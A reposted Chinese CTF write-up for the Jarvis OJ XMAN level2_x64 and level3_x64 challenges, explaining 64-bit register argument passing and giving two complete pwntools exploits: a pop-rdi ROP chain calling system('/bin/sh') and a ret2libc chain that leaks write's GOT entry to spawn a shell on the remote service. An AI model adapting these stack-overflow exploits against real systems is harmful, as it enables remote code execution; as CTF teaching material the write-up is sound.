2. 程式人生 > >[轉]Jarvis OJ- [XMAN]level2/3_x64-Writeup

[轉]Jarvis OJ- [XMAN]level2/3_x64-Writeup

阿新 發佈:2017-12-03
article lan line get adg net asc 32位 lba 

學弟寫的挺好的,我就直接轉過來了
原文鏈接:http://www.cnblogs.com/ZHijack/p/7940686.html

兩道64位棧溢出,思路和之前的32位溢出基本一致,所以放在一起

在這兩道中體現的32位和64位的主要區別在於函數參數傳遞的方式

在32位程序運行中,函數參數直接壓入棧中

    調用函數時棧的結構為:調用函數地址->函數的返回地址->參數n->參數n-1->···->參數1

在64位程序運行中,參數傳遞需要寄存器

    64位參數傳遞約定:前六個參數按順序存儲在寄存器rdi, rsi, rdx, rcx, r8, r9中

    參數超過六個時,從第七個開始壓入棧中

Level2_x64

   技術分享圖片

  技術分享圖片

  和32位level2程序邏輯基本一致

  只要在調用system函數傳遞參數“/bin/sh”時,將其傳入寄存器即可。

  Something new  

    可以使用ROPgadget搜索我們需要的rop鏈

    ROPgadget可以在程序的匯編代碼中尋找字符串或命令

    技術分享圖片

   箭頭所指pop rdi ; ret 即為將棧頂元素彈出並存入寄存器rdi,ret返回棧。

   可以利用此類語句將函數參數傳入寄存器。

   exp:

技術分享圖片 
#!usr/bin/env python 
# -*- coding: utf-8 -*-
from pwn import  *

io = remote("pwn2.jarvisoj.com",9882)
elf = ELF("./level2_x64")

sys_addr = elf.symbols["system"]
bin_addr = 0x600A90    #利用ROPgadget獲得
rdi_ret = 0x4006B3

payload = ‘‘
payload += a * 0x88
payload += p64(rdi_ret)
payload += p64(bin_addr)
payload 
 
+= p64(sys_addr)

io.recvline()
io.sendline(payload)
io.interactive()
io.close()
技術分享圖片

   結果如下

   技術分享圖片

Level3_x64

  和上一個相同,差別只在調用函數時參數的傳遞

  技術分享圖片

  按照參數傳遞約定,write函數需要三個參數,需要rdi,rsi,rdx三個寄存器,但是沒有發現所需要的第三個寄存器rdx

  所以可以先跳過第三個參數(讀入長度)

  寫好exp之後可以調試下,查看在調用函數之前,rdx的值,如果rdx值>=8,那麽就不需要處理,

  exp

技術分享圖片 
#!usr/bin/env python 
# -*- coding: utf-8 -*-


from pwn import *
context.log_level = debug
io = remote("pwn2.jarvisoj.com",9883)
elf = ELF("./level3_x64")

write_plt = elf.plt["write"]
write_got = elf.got["write"]
func = elf.symbols["vulnerable_function"]

libc = ELF("./libc-2.19.so")
write_libc = libc.symbols["write"]
sys_libc = libc.symbols["system"]
bin_libc = libc.search("/bin/sh").next()

rdi_ret = 0x4006B3
rsi_ret = 0x4006B1
payload1 = a * 0x88
payload1 += p64(rdi_ret) + p64(1)   # rdi
payload1 += p64(rsi_ret) + p64(write_got) + p64(0xdeadbeef)  #rsi 和 r15
payload1 += p64(write_plt) + p64(func)

io.recvline()
io.sendline(payload1)
write_addr = u64(io.recv(8))
sys_addr = write_addr - write_libc + sys_libc
bin_addr = write_addr - write_libc + bin_libc

payload2 = a * 0x88
payload2 += p64(rdi_ret) + p64(bin_addr)
payload2 += p64(sys_addr) + p64(0xdeadbeef)

io.recvline()
io.sendline(payload2)
io.interactive()
io.close()
技術分享圖片

  結果:

  技術分享圖片

關於程序中寄存器不夠的問題,留一個鏈接http://m.blog.csdn.net/zsj2102/article/details/78560300

技術分享圖片

講的還算清楚

[轉]Jarvis OJ- [XMAN]level2/3_x64-Writeup

相關推薦

[]Jarvis OJ- [XMAN]level2/3_x64-Writeup

article lan line get adg net asc 32位 lba 學弟寫的挺好的,我就直接轉過來了 原文鏈接:http://www.cnblogs.com/ZHijack/p/7940686.html 兩道64位棧溢出,思路和之前

Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位簡單棧溢位

兩道64位棧溢位,思路和之前的32位溢位基本一致,所以放在一起 在這兩道中體現的32位和64位的主要區別在於函式引數傳遞的方式 在32位程式執行中,函式引數直接壓入棧中     呼叫函式時棧的結構為:呼叫函式地址->函式的返回地址->引數n->引數n-1->···->引數1 在6

Jarvis OJ - [XMAN]level1 - Writeup

shellcode text ext recv 函數 rec spa 偏移 shell Jarvis OJ - [XMAN]level1 - Writeup M4x原創,轉載請表明出處http://www.cnblogs.com/WangAoBo/p/7594173.ht

Jarvis OJ - [XMAN]level1 - Writeup——簡單shellcode利用

adding lan raft 截取 eight .sh close ott 作者 100分的pwn 簡單查看一下,果然還是比較簡單的 放到ida中查看一下,有明顯的溢出函數,並且在函數中打印出了字符串的地址,並且字符串比較長,沒有NX保護 所以我們很容易想到

Jarvis OJ - [XMAN]level3 - Writeup——rop2libc嘗試

但是 可執行程序 pre 問題 com pad arch 進行 sea 這次除了elf程序還附帶一個動態鏈接庫 先看一下,很一般的保護 思路分析 在ida中查看,可以確定通過read函數輸入buf進行溢出,但是並沒有看到合適的目標函數 但是用ida打開附帶的鏈接庫

Jarvis OJ - DD-Hello -Writeup

真的 ida os x jpg 又一 可執行 idt block 題目 Jarvis OJ - DD-Hello -Writeup 轉載請註明出處http://www.cnblogs.com/WangAoBo/p/7239216.html 題目: 分析: 第一次做這道

18.9.18 Jarvis OJ PWN----[XMAN]level0

拖進IDA 看到有函式callsystem,那就直接把主函式往它身上引 在vulnerable裡有緩衝區,試著溢位 ebp偏移量0x80個位元組,覆蓋後再用8個位元組覆蓋儲存的ebp,然後將返回地址設為callsystem函式的地址 指令碼 #coding=ut

18.9.20 Jarvis OJ PWN----[XMAN]level4

checksec之後,發現可以棧溢位 找可以溢位的地方 我們可以讀取無窮無盡的數 但是在IDA中沒找到system函式,同時題目也沒有給我們lib檔案,咋辦………… 根據大佬的資料,瞭解到了pwntools的一個函式DynELF,DynELF函式可以leak

Jarvis OJ-PWN-[XMAN]level3 wp

地址:nc pwn2.jarvisoj.com 9879 一開始拿到題目的時候是一個rar檔案 解壓後就得到了兩個檔案 對這兩個檔案檢視保護 兩個檔案都是32位的 level3沒有開啟棧保護 可以利用棧溢位;棧中內容不可使用 不用shellcode 可以看

jarvis oj level2

拖進ida,直接就看到了system函式,同時搜尋一下,發現了“bin/sh”,沒什麼好說的,上指令碼 from pwn import * conn=remote("pwn2.jarvisoj.com","9878") conn.recvline() e=ELF("./level2")

Jarvis OJ web WriteUp

我要開始做Jarvis OJ上的題目啦!!!之前bugku上還剩下的幾道題,之後也會再補上的,做出來之後,就會把思路寫到部落格裡的。新手,有錯的地方多多指教。(不是按順序寫的…我就先挑簡單的做啦~~~) PORT 51 這個題目用到了curl命令,是利用UR

Jarvis OJ-PWN-[XMAN]level0 wp

地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的題目 先準備一下環境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先開啟虛擬機器

Jarvis OJ-Reverse題目Writeup

打開 findview android 輸出 color content 來看 好的 我們 做一道更一道吧233333 DD-Android Easy 下載apk,先安裝一下試試吧…… 猜測是輸入正確的內容後給flag吧 將後綴改成zip,解壓,用dex2jar處理cla

jarvis oj reverse 病毒資料分析 writeup

這題之前做過,但是做到一半就放棄了,現在又回來做一下 首先這題其實還是有點難度的 我們先來分析下main函式部分,首先它做了反debug判斷,獲取父程序資訊 其次它還判斷了程式所在位置,過了這幾個判斷之後,獲取當前時間作為seed給srand 然後在登錄

jarvis OJ WEB題目writeup

二分 重新 map 註冊 cal lib 取圖 查看圖片 字段 0x00前言 發現一個很好的ctf平臺,題目感覺很有趣,學習了一波並記錄一下 https://www.jarvisoj.com 0x01 Port51 題目要求是用51端口去訪問該網頁,註意下,要

Jarvis Oj Pwn 學習筆記-level1

ID lin send add 技術分享 r+ rar bsp strong 32位pwn題目 呈上鏈接: https://files.cnblogs.com/files/Magpie/level1.rar nc pwn2.jarvisoj.com 9877 先看一下保護:

[XMAN]level2

address end image soj interact ima bubuko cti div 老套路 checksec ida查看 覆蓋掉 之後system地址再返回覆蓋 最後/bin/sh地址 # -*- coding:utf-

jarvis OJ

basic Baby’s Crack 程式大概就是開啟一個命令列輸入的 file,然後開啟一個 tmp,對 file 加密寫入 tmp,將 file 刪除,將 tmp 重新命名為 file。 直接在 ida 中 F5,關鍵的程式碼就是: while (feof(*(_QWOR

Jarvis OJ reverse之androideasy wp

這是一道我第一次解出的安卓逆向類CTF題目,下面記錄並分享一下思路。 一,把檔案下載下來,開啟是一個apk檔案,用jeb反編譯(找到MainAcitivity,然後右鍵Decompile即可)得到java程式碼。 package com.a.sample.androidtest; impo

[Jarvis OJ] -Basic

https://www.jarvisoj.com/challenges Basic -.-字串 請選手觀察以下密文並轉換成flag形式 ..-. .-.. .- --. ..... ..--- ..--- ----- .---- ---.. -.. -.... -.... ..... ...-- ---